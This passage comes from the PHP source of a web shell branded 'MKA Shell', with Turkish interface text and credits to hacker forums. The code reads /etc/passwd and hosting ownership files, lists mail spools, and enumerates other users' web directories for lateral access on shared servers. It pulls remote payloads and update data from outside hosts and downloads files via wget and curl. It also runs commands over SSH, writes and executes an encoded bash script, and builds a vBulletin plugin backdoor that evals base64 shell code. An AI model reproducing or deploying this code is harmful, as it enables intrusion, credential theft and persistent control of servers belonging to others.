- echo '<textarea cols=100 rows=20 class=box readonly>' . htmlspecialchars(@fread($fh, filesize('test1.php'))) . '</textarea>';
- @fclose($fh);
- unlink('test1.php');
- }
- echo '</pre>';
- } elseif ($_POST['alfa1'] == 'require') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- echo require ('/etc/passwd');
- echo '</pre>';
- } elseif ($_POST['alfa1'] == 'uid') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- for ($uid = 0;$uid < 10000;$uid++) {
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list($key, $val) = each($ara)) {
- print "$val:";
- }
- print "
- ";
- }
- }
- echo '</pre>';
- } elseif ($_POST['alfa1'] == 'stream') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- $file = '/etc/passwd';
- if ($stream = fopen($file, 'r')) {
- echo stream_get_contents($stream, -1, 0);
- fclose($stream);
- }
- echo '</pre>';
- } elseif ($_POST['alfa1'] == 'son') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- echo __read_file('/etc/passwd');
- echo '</pre>';
- } elseif ($_POST['alfa1'] == 'kul') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- echo alfaEx('cat /etc/trueuserowners');
- echo '</pre>';
- } elseif ($_POST['alfa1'] == 'kul2') {
- echo "<pre class='ml1' style='margin-top:5px' >";
- echo passthru('ls /var/mail');
- echo '</pre>';
- }
- }
- echo '</div>';
- alfafooter();
- }
- function alfalogout() {
- unset($_SESSION['AlfaUser'], $_SESSION['AlfaPass']);
- echo ("<center><font color='red'>Logout...</font></center>");
- }
- function showAnimation($name) {
- return '-webkit-animation: ' . $name . ' 800ms ease-in-out forwards;-moz-animation: ' . $name . ' 800ms ease-in-out forwards;-ms-animation: ' . $name . ' 800ms ease-in-out forwards;animation: ' . $name . ' 800ms ease-in-out forwards;';
- }
- function __showicon($r) {
- $s['btn'] = '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';
- $s['alfamini'] = file_get_contents('https://myofcl.github.io/mkaspyshell/alfamini');
- $s['loader'] = file_get_contents('https://myofcl.github.io/mkaspyshell/loader');
- return 'http://panel.warezm.com/33.png';
- }
- function __download($url, $path = false) {
- if (!preg_match("/[a-z]+:\/\/.+/", $url)) return false;
- $saveas = basename(rawurldecode($url));
- if ($path) {
- $saveas = $path . $saveas;
- }
- if ($content = __read_file($url)) {
- if (@is_file($saveas)) @unlink($saveas);
- if (__write_file($saveas, $content)) {
- return true;
- }
- }
- $buff = alfaEx('wget ' . $url . ' -O ' . $saveas);
- if (@is_file($saveas)) return true;
- $buff = alfaEx('curl ' . $url . ' -o ' . $saveas);
- if (@is_file($saveas)) return true;
- $buff = alfaEx('lwp-download ' . $url . ' ' . $saveas);
- if (@is_file($saveas)) return true;
- $buff = alfaEx('lynx -source ' . $url . ' > ' . $saveas);
- if (@is_file($saveas)) return true;
- $buff = alfaEx('GET ' . $url . ' > ' . $saveas);
- if (@is_file($saveas)) return true;
- $buff = alfaEx('links -source ' . $url . ' > ' . $saveas);
- if (@is_file($saveas)) return true;
- $buff = alfaEx('fetch -o ' . $saveas . ' -p ' . $url);
- if (@is_file($saveas)) return true;
- return false;
- }
- function clean_string($string) {
- if (function_exists('iconv')) {
- $s = trim($string);
- $s = iconv('UTF-8', 'UTF-8//IGNORE', $s);
- }
- return $s;
- }
- function __read_file($file, $boom = true) {
- $content = false;
- if ($fh = @fopen($file, 'rb')) {
- $content = '';
- while (!feof($fh)) {
- $content.= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
- }
- }
- if (empty($content) || !$content) {
- $content = alfaEx("cat '" . addslashes($file) . "'");
- }
- return $content;
- }
- function alfaSettings() {
- alfahead();
- $i = 0;
- echo "<pre><div class='margin: 5px auto;'>";
- $etc = fopen('/etc/passwd', 'r') or die('<font color=red>passwd okuyamadm pampa</font>');
- while ($passwd = fgets($etc)) {
- if ($passwd == '' || !$etc) {
- echo '<font color=red>passwd okuyamadm pampa</font>';
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
- foreach ($user_jumping[1] as $user_tatsumi_jump) {
- $user_jumping_dir = "/home/$user_tatsumi_jump/public_html";
- if (is_readable($user_jumping_dir)) {
- $i++;
- $jrw = '[<font color=white>R</font>] <a href="javascript:void(0)" onclick="g(\'FilesMan\',\'' . $user_jumping_dir . '\');" ><font color=gold>' . $user_jumping_dir . '</font></a>';
- if (is_writable($user_jumping_dir)) {
- $jrw = '[<font color=white>RW</font>] <a href="javascript:void(0)" onclick="g(\'FilesMan\',\'' . $user_jumping_dir . '\');"><font color=gold>' . $user_jumping_dir . '</font></a>';
- }
- echo $jrw;
- if (function_exists('posix_getpwuid')) {
- $domain_jump = file_get_contents('/etc/named.conf');
- if ($domain_jump == '') {
- echo ' => ( <font color=red>Domaini ekemedim pampa</font> )<br>';
- } else {
- preg_match_all('#/var/named/(.*?).db#', $domain_jump, $domains_jump);
- foreach ($domains_jump[1] as $dj) {
- $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_jumping_url = $user_jumping_url['name'];
- if ($user_jumping_url == $user_tatsumi_jump) {
- echo " => ( <u>$dj</u> )<br>";
- break;
- }
- }
- }
- } else {
- echo '<br>';
- }
- }
- }
- }
- }
- if ($i == 0) {
- } else {
- echo '<br>Toplam ' . $i . ' domaine zplayabilirsin ';
- }
- echo ('</div>');
- alfafooter();
- }
- function alfaplus() {
- alfahead();
- echo __pre() . "<pre><center><a href='//spyhackerz.com'><img src='https://vignette.wikia.nocookie.net/s4s/images/b/b8/Stone-Cold-Steve-Austin-Finger-wwestalker.jpg/revision/latest?cb=20130923005546'></a><br><br><b><font size='+3' color='#00A220'>☮ ~ MKA Shell ~ ☮</font><br><br><font color='#00A220'>ICQ : 743635373 || Skype : N13P10 </font><br><br><br><br><font color='#FF0000'>https://www.spyhackerz.com // https://www.warezm.com ///// Shell Coded By <a href='//spyhackerz.com'>MKA Shell</a></font><br><br><font color='white'>Emei geenler: MuRo, MKA7, MY0FC4, Hayben, skyc0de,Mectruy, Koswog </font><br><br></center></pre>";
- echo ('</div>');
- alfafooter();
- }
- function alfaEmail() {
- alfahead();
- $get = new AlfaCURL();
- $get->ssl = true;
- $data = $get->Send('https://temp-mail.org/tr/option/refresh/');
- echo $data;
- alfafooter();
- }
- function alfassh2() {
- if (function_exists('ssh2_connect')) {
- $_SESSION['connected'] = false;
- $ssh_ip = $_POST['alfa1'];
- $ssh_login = $_POST['alfa2'];
- $ssh_pass = $_POST['alfa3'];
- $ssh_port = $_POST['alfa4'];
- $ssh_command = $_POST['alfa5'];
- if ($alfaconnect2ssh = @ssh2_connect($ssh_ip, $ssh_port)) {
- if ($alfalogin = @ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) {
- $_SESSION['connected'] = true;
- }
- }
- if ($_SESSION['connected'] !== true) {
- alfahead();
- echo '<div class=header>';
- echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
- alfafooter();
- }
- if ($_SESSION['connected'] == true) {
- alfahead();
- echo '<div class=header>';
- echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"" . $ssh_ip . "\",\"" . $ssh_login . "\",\"" . $ssh_pass . "\",\"" . $ssh_port . "\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
- $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
- stream_set_blocking($alfastream, true);
- $output = ssh2_fetch_stream($alfastream, SSH2_STREAM_STDIO);
- if ($_POST['alfa6'] == '>>') {
- echo '<pre class=ml1>';
- ob_start();
- echo stream_get_contents($output);
- echo htmlspecialchars(ob_get_clean());
- }
- echo '</div>';
- alfafooter();
- }
- } else {
- alfahead();
- echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
- alfafooter();
- }
- }
- function output($string) {
- echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $string . "'>Click Here !</a></font></b></center><br><br>";
- }
- function alfaupdatepath() {
- if ($_POST['path'] != '') {
- $_SESSION[__LAST_CWD__] = $_POST['path'];
- }
- echo ($_SESSION[__LAST_CWD__]);
- }
- function alfacheckfiletype() {
- $path = $_POST['path'];
- $arg = $_POST['arg'];
- if (@is_file($path . '/' . $arg)) {
- echo ('file');
- } else {
- echo ('dir');
- }
- }
- function alfacheckupdate() {
- if (!isset($_COOKIE['alfa_checkupdate'])) {
- if (function_exists('curl_version')) {
- $update = new AlfaCURL();
- $json = $update->Send('http://panel.warezm.com/bak.json');
- $json = @json_decode($json);
- if ($json) {
- if (__MKA_VERSION__ != $json->version) {
- @setcookie('alfa_checkupdate', '1', time() + 86400);
- echo ('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="' . $json->url . '" target="_blank">' . $json->text . '<br> Version: ' . $json->version . '</a></div></div></div>');
- }
- if (isset($json->js)) {
- echo ('<div style="display:none;" id="jsurl">' . $json->js . '</div>');
- }
- }
- }
- }
- }
- function alfaWriteTocgiapi($name, $source) {
- @chdir(dirname($_SERVER['SCRIPT_FILENAME']));
- @mkdir('mka7cgiapi', 0755);
- __write_file('mka7cgiapi/' . $name, __get_resource($source));
- @chmod('mka7cgiapi/' . $name, 0755);
- }
- function alfacheckcgi() {
- if (strlen(alfaEx('id', false, true, true)) > 0) echo ('ok');
- else echo ('no');
- }
- function alfaupdateheader() {
- if (!isset($_SESSION['updateheader_data'])) {
- $bash = 'zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==';
- $realdir = addslashes(dirname($_SERVER['SCRIPT_FILENAME']));
- alfaWriteTocgiapi('getheader.mka', $bash);
- $data = alfaEx("cd '{$realdir}/mka7cgiapi';sh getheader.mka", false, true, true);
- if (@is_array(@json_decode($data, true))) {
- $_SESSION['updateheader_data'] = $data;
- echo $data;
- }
- } else {
- echo $_SESSION['updateheader_data'];
- }
- }
- function is_ipv4($ip) {
- return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
- }
- function __alert($s) {
- echo '<center>' . __pre() . $s . '</center>';
- }
- function create_table($data) {
- echo '<table border="1">';
- foreach ($data as $key => $val) {
- $array = array();
- foreach ($val as $k => $v) {
- $array[$k] = $v;
- }
- echo "<tr><td><div class='tbltxt'>" . $array['tdName'] . "</div></td><td><input type='text' id='" . $array['id'] . "' name='" . $array['inputName'] . "' " . ($array['placeholder'] ? 'placeholder' : 'value') . "='" . $array['inputValue'] . "' size='" . $array['inputSize'] . "' " . ($array['disabled'] ? 'disabled' : '') . '></td></tr>';
- }
- echo '</table>';
- }
- function alfaphp2xml() {
- alfahead();
- echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
- <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
- <input type='submit' name='go' value=' ' /></p></form></center>";
- if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
- echo __pre() . "<p><center><textarea rows='10' name='users' cols='80'>";
- echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\'' . __ZW5jb2Rlcg($_POST['alfa1']) . '\'));exit;}]]></phpcode></plugin></plugins>';
- echo '</textarea></center></p>';
- }
- echo '</center></div>';
- alfafooter();
- }
- function alfafooter() {
- if (!isset($_POST['ajax'])) {
- echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' ><tr><td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Dosya olutur : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td><td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Klasr olutur </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td><td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Sil : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td><td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td></tr><tr><td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Dizin deitir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='" . htmlspecialchars($GLOBALS['cwd']) . 